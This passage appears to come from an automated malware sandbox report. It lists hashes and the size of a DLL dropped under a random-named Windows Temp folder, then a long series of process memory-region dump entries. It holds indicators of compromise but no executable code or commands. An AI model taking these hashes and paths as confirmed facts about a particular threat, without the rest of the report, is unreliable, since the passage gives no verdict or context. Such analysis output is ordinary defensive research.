                                                                                                                                          MD5

                                                                                                                                          21f2e2855c00210b9ddbe4363e485938

                                                                                                                                          SHA1

                                                                                                                                          21a1797718e32220b0f8c4a87cfeac41575fe892

                                                                                                                                          SHA256

                                                                                                                                          b674f303bb97741166d08b9b40b34625d6774176e5f45d48641584893a4734fc

                                                                                                                                          SHA512

                                                                                                                                          419445cb670e28c7a46747ebe36d0a5845c4c398e9d811f584200e09285752e3758f2f1790dadfcf6ae007a0c94bb4a5277aacbab844c8c9b0e625e4c03f105f

                                                                                                                                        • \Windows\Temp\oCRUNVefZTIhACRx\xNdMoLis\zSSnfEX.dll
                                                                                                                                          Filesize

                                                                                                                                          6.2MB

                                                                                                                                          MD5

                                                                                                                                          21f2e2855c00210b9ddbe4363e485938

                                                                                                                                          SHA1

                                                                                                                                          21a1797718e32220b0f8c4a87cfeac41575fe892

                                                                                                                                          SHA256

                                                                                                                                          b674f303bb97741166d08b9b40b34625d6774176e5f45d48641584893a4734fc

                                                                                                                                          SHA512

                                                                                                                                          419445cb670e28c7a46747ebe36d0a5845c4c398e9d811f584200e09285752e3758f2f1790dadfcf6ae007a0c94bb4a5277aacbab844c8c9b0e625e4c03f105f

                                                                                                                                        • memory/112-130-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/324-125-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/368-74-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/368-158-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/456-92-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/472-162-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/572-155-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/672-126-0x0000000002844000-0x0000000002847000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                        • memory/672-122-0x000000001B750000-0x000000001BA4F000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          3.0MB

                                                                                                                                        • memory/672-127-0x000000000284B000-0x000000000286A000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          124KB

                                                                                                                                        • memory/672-117-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/672-120-0x000007FEF3D20000-0x000007FEF4743000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          10.1MB

                                                                                                                                        • memory/672-121-0x000007FEF3100000-0x000007FEF3C5D000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          11.4MB

                                                                                                                                        • memory/672-123-0x0000000002844000-0x0000000002847000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                        • memory/672-124-0x000000000284B000-0x000000000286A000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          124KB

                                                                                                                                        • memory/688-175-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/760-147-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/764-87-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/764-116-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/768-77-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/804-108-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/872-79-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/876-141-0x000000001B720000-0x000000001BA1F000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          3.0MB

                                                                                                                                        • memory/876-140-0x00000000029A4000-0x00000000029A7000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                        • memory/876-161-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/876-144-0x00000000029AB000-0x00000000029CA000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          124KB

                                                                                                                                        • memory/876-83-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/876-143-0x00000000029A4000-0x00000000029A7000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                        • memory/876-135-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/876-139-0x000007FEEE9A0000-0x000007FEEF4FD000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          11.4MB

                                                                                                                                        • memory/876-138-0x000007FEF3CB0000-0x000007FEF46D3000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          10.1MB

                                                                                                                                        • memory/904-75-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/968-165-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1008-82-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1048-54-0x0000000076171000-0x0000000076173000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/1172-148-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1208-174-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1212-132-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1284-172-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1284-131-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1284-154-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1304-151-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1304-100-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1316-178-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1332-145-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1392-177-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1420-105-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1440-134-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1480-160-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1512-71-0x0000000010000000-0x0000000010D78000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          13.5MB

                                                                                                                                        • memory/1512-64-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1520-167-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1528-168-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1568-146-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1580-176-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1580-86-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1580-115-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1596-129-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1596-171-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1596-152-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1600-213-0x0000000003CB0000-0x0000000003D28000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          480KB

                                                                                                                                        • memory/1600-202-0x0000000003890000-0x00000000038FA000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          424KB

                                                                                                                                        • memory/1600-150-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1600-198-0x0000000002D90000-0x0000000002E15000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          532KB

                                                                                                                                        • memory/1600-215-0x00000000045F0000-0x00000000046A7000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          732KB

                                                                                                                                        • memory/1604-159-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1628-149-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1652-164-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1708-173-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1724-90-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1736-169-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1760-153-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1780-133-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1800-179-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1848-180-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1848-142-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1936-163-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1940-166-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1956-170-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1956-128-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1968-103-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1972-222-0x0000000000F70000-0x0000000001CE8000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          13.5MB

                                                                                                                                        • memory/1980-186-0x0000000002434000-0x0000000002437000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                        • memory/1980-187-0x000000000243B000-0x000000000245A000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          124KB

                                                                                                                                        • memory/1980-183-0x000007FEF3E30000-0x000007FEF4853000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          10.1MB

                                                                                                                                        • memory/1980-184-0x000007FEF32D0000-0x000007FEF3E2D000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          11.4MB

                                                                                                                                        • memory/1980-185-0x0000000002434000-0x0000000002437000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                        • memory/1984-95-0x000007FEFC281000-0x000007FEFC283000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/1984-99-0x000000001B800000-0x000000001BAFF000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          3.0MB

                                                                                                                                        • memory/1984-102-0x000000000296B000-0x000000000298A000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          124KB

                                                                                                                                        • memory/1984-94-0x0000000000000000-mapping.dmp
                                                                                                                                        • memory/1984-97-0x000007FEF3CD0000-0x000007FEF482D000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          11.4MB

                                                                                                                                        • memory/1984-96-0x000007FEF4830000-0x000007FEF5253000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          10.1MB

                                                                                                                                        • memory/1984-98-0x0000000002964000-0x0000000002967000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                        • memory/1984-101-0x0000000002964000-0x0000000002967000-memory.dmp
                                                                                                                                          Filesize

                                                                                                                                          12KB

                                                                                                                                        • memory/1988-56-0x0000000000000000-mapping.dmp